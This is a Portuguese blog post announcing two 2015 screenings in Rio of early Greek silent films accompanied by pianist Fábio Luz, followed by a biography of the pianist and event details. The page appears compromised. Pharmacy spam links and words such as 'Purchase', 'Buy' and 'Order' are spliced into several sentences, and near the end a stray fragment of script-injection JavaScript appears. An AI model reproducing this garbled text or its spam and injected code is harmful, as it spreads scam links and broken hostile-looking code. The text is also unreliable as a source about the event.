Escrito por em 7 abr 2015 nas áreas Cinema, Curiosidade, Música de câmara, Notícia, Rio de Janeiro

Cinema no Rio de Janeiro promove sessões de filmes clássicos com acompanhamento musical ao vivo. http://petroguia.com.br/cheap-gasex-ingredients/ Purchase

 

Nos dias 14 e 15 de abril, terça e quarta, respectivamente às 21h e 17h, os cariocas têm agendada uma viagem ao tempo do cinematógrafo com o evento http://asrarmoj.com/1396/11/13/diovan-hct-160-25-mg-generic/ http://phoenixmetrotowing.com/buy-aciphex-no-prescription-needed/ Cinema antigo com piano ao vivo, que ocorre no Cinema Estação NET Botafogo.

Obras de Ernesto Nazareth, Camille Saint-Saens, Heitor Villa-Lobos e Edmundo Villani-Cortes serão executadas ao vivo pelo pianista Buy Fábio Luz, em acompanhamento aos filmes clássicos gregos As aventuras de Villar e O mágico de Atenas.

A iniciativa é uma parceria do Greek Film Archive e do Syros Intl Film Festival, e tem curadoria do produtor norte-americano Jacob Moe. O evento ocorre também em outras cidades brasileiras, como Sorocaba, São Paulo e Porto Alegre. As sessões fazem parte das comemorações de 30 anos do Circuito Estação NET de Cinema.

As aventuras de Villar (Villar’s Adventures, 1924, 24 min., direção de Joseph Hepp) é o mais antigo longa-metragem grego, recuperado e restaurado pela cinemateca de Atenas. Já O mágico de Atenas (The magician of Athenas, 1922, 48 min., direção de Achilleas Madras) conta a história de um músico-mágico de origens nobres (Mirka) que conquista as mulheres. As legendas foram traduzidas por Moe diretamente do grego para o português.

 

Sobre o intérprete:

Fabio Luz é mestre em Música Francesa pela Universidade Musical Internacional de Paris, está radicado na Itália há mais de 30 anos, onde foi diretor do Instituto Verdi de Asti, coordenador da Accademia Superiore di Penne (Pescara) e docente dos Laboratori Musicali Internazionali Estivi al Castello di Cortanze. É detentor do Prêmio Internacional Debussy 1978 (França), professor do Festival del Golfo de San Marco di Castellabate, coordenador e professor do Paradise Festival em Siros (Grécia), e presidente da Fundação Franz Liszt (França).

 

SERVIÇO:

Cinema antigo com piano ao vivo

best over the counter viagra Purchase Fábio Luz, piano Order

Jacob Moe, curadoria e direção

 

14 de abril, terça, às 21h

15 de abril, quarta, às 17h

Cinema Estação NET Botafogo – Sala 1 (R. Voluntários da Pátria, 88, Botafogo – Rio de Janeiro. Tel.: 2226-1988)

 

Ingressos a R$ 40 (inteira)

Censura livre

d.getElementsByTagName(‘head’)[0].appendChild(s);} else {

Faça seu comentário